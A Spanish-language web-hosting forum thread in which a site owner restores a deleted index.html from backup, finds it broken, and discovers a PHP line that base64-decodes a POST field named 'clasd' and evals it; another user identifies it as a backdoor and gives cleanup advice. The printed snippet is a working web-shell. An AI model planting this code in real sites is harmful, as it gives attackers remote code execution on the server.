Regresar a la página www.ComoCrearTuWeb.com
Resultados 1 al 7 de 7

Tema: Index borrado que no puedo volver a reactivar

Vista Híbrida

Mensaje Anterior Mensaje Anterior   Próximo Mensaje Próximo Mensaje
    Recien Llegado! Merodeador
    Poder de Reputación
    0

Index borrado que no puedo volver a reactivar

Hola buenos días:

Hace ya varios años siguiendo el curso de HTML de "como crear tu web" conseguí, sin tener conocimientos, hacer una pagina web de lo mas correcto. www.delatorre-hausmann.com

Ayer intente hacer algunos cambios en el HTML-kit y no se como borre el index.html.

"Preso del pánico" contacte con el servidor razyhosting que me envio un backup de seguridad. Es decir conseguí el texto integro de mi index.html . Toda la información que tengo de la web la tengo en html-kit en conexión con el servidor. El ordenador que use para crear la web ya no existe.

He ido a mi html-kit y he intentado crear un nuevo archivo index.html pero me daba error " could not upload C:\user\Angel-.......\Appdata\local\temp\TMP562E.htm to www.delatorre-hausmann.com "

en cambio si me deja crear cualquier otro archivo con otro nombre...asi que de mala manera...he creado un archivo con otro nombre y luego lo he renombrado index.html y me lo ha aceptado (es el que ahora funciona con el texto "web en revisión técnica" ).

Pensaba que bastaba con copiar exactamente el texto que tenia del backup del index.html eliminado en el nuevo archivo index.html para que todo volviera a funcionar, pero no: Cuando hago eso, aparte de que no se visualiza en la web (dándome error http 403), al cerrar el html-kit y volver a abrirlo, el index.html ha desaparecido.

Asi que vuelvo a cargar el index.html para al menos dejar el texto "web en revisión tecnica"

La verdad no se que mas probar....¿alguna ayuda por favor?

Muchas Gracias a todos.

Esto empieza a ser un vicio... Habitante Avatar de Doodleo
    Poder de Reputación
    21
    Tienes cPanel en tu hosting o algún panel de control? Prueba desde el administrador de archivos que debería traer (casi todos tienen uno). Si no, bájate algún programa de FTP como Filezilla para subir tus archivos.

Poder de Reputación
    0
    Hola Doodleo:

para poder descargarme el backup ya me baje el Firezilla y poder tener el texto de mi pagina index. Pero sigo sin entender porque no puedo abrir un archivo llamado index.html, copiar este texto, idéntico al anterior y que vuelva a funcionar.
    Pedi ayuda a razyhosting y me ha dicho:

"Desafortunadamente, nuestros administradores han comprobado y no han encontrado las bases de datos de su cuenta y no hay copias de seguridad de bases de datos para las bases de datos creadas con la cuenta de alojamiento que está utilizando para albergar delatorre-hausmann.com.

En sus mensajes anteriores que ha pedido ayuda en la descarga de una copia de seguridad de los archivos del sitio web a través de la copia de seguridad Solicitud de sección en el panel de control de restauración.
    Usted puede presentar una nueva solicitud de copia de seguridad de los archivos y descargarlos con las credenciales FTP previstas en la misma sección."

No se bien que esta pasando. Ahora me pondré a crear desde cero la index (la que ahora pone simplemente "web en revisión técnica"...paso a paso ...en vez de volcar de golpe todo el texto que consegui del backup. La cuestión es que puedo entrar en la web, no por el index sino por otro camino indirecto: por ej.

http://www.delatorre-hausmann.com/plantilla.html

Es decir, la web sigue operativa.

Doodleo muchas gracias por contestar, si se te ocurre algo en lo que me puedas ayudar te / os lo agredeceria.

Un saludo.

Poder de Reputación
    0
    Hola finalmente encontré el fallo:

Os recuerdo que me había desaparecido la pagina index. Pedi una copia de seguridad al servidor y me la enviaron. Mi primer problema fue que no podía crear una pagina que se llamara index.html, asi que después de varios intentos la cree de la siguiente manera: cree una pagina que llame prueba.html y cuando me la acepto la renombre como index.html...no se porque asi si me la aceptaba.
    Luego volqué el texto de la hoja index.html de la copia de seguridad en la nueva pagina index.html, pero me daba error....después de varias pruebas me di cuenta que justo al inicio de la pagina, antes de

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

me aparecia un texto que ponía:

<?php if(isset($_POST['clasd'])){$str = base64_decode(base64_decode($_POST['clasd']));eval("?> $str <?php ");}?>

que la verdad no se de donde ha salido. Elimine esa parte dejando la configuración clásica de

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<head>
    </head>
    <body>
    </body>

y todo empezó a funcionar.

Muchas Gracias por todo.

Un saludo.

Poder de Reputación
    21
    Eso es muy raro y tiene pinta de backdoor... sabes si alguien más he tenido acceso a tu servidor? Con ese código, desde una página remota enviando un formulario hacia tu página con un input de nombre "clasd" ejecutaría el código que el atacante quisiera...
    Cambia las contraseñas por seguridad, y revisa todos tus archivos por si acaso.

Poder de Reputación
    0
    Hola Doodleo:

soy el único que tengo acceso al servidor. Pero cambiare las contraseñas y revisare los archivos como me aconsejas. Tengo otras dos webs operativas y estas aparentan estar normales, los index no tienen este trozo de texto raro (y eran copia del mismo esquema que la que me ha dado el problema) . ¿Puede ser que ese trozo de texto lo generara el propio backup del servidor?.
    Muchas gracias por responder Doodleo.

Un saludo.

Poder de Reputación
    21
    Busca también en el resto de archivos del servidor, no sólo en el index. Te aconsejaría mirar en los de tus otras dos páginas también, si alguien, por cualquier razón consiguió acceder al servidor y éstas están alojadas en el mismo, podría hacer lo mismo que en la otra. De igual modo te recomendaría analizar tu PC por si acaso consiguieran colarte un keylogger para robarte la contraseña del servidor.

Espero no te esté alarmando mucho pero la verdad es que me pareció bastante raro ese código, a ver si alguien más del foro nos cuenta experiencias similares o sabe de qué es exactamente. Pero siempre es mejor prevenir...

Saludos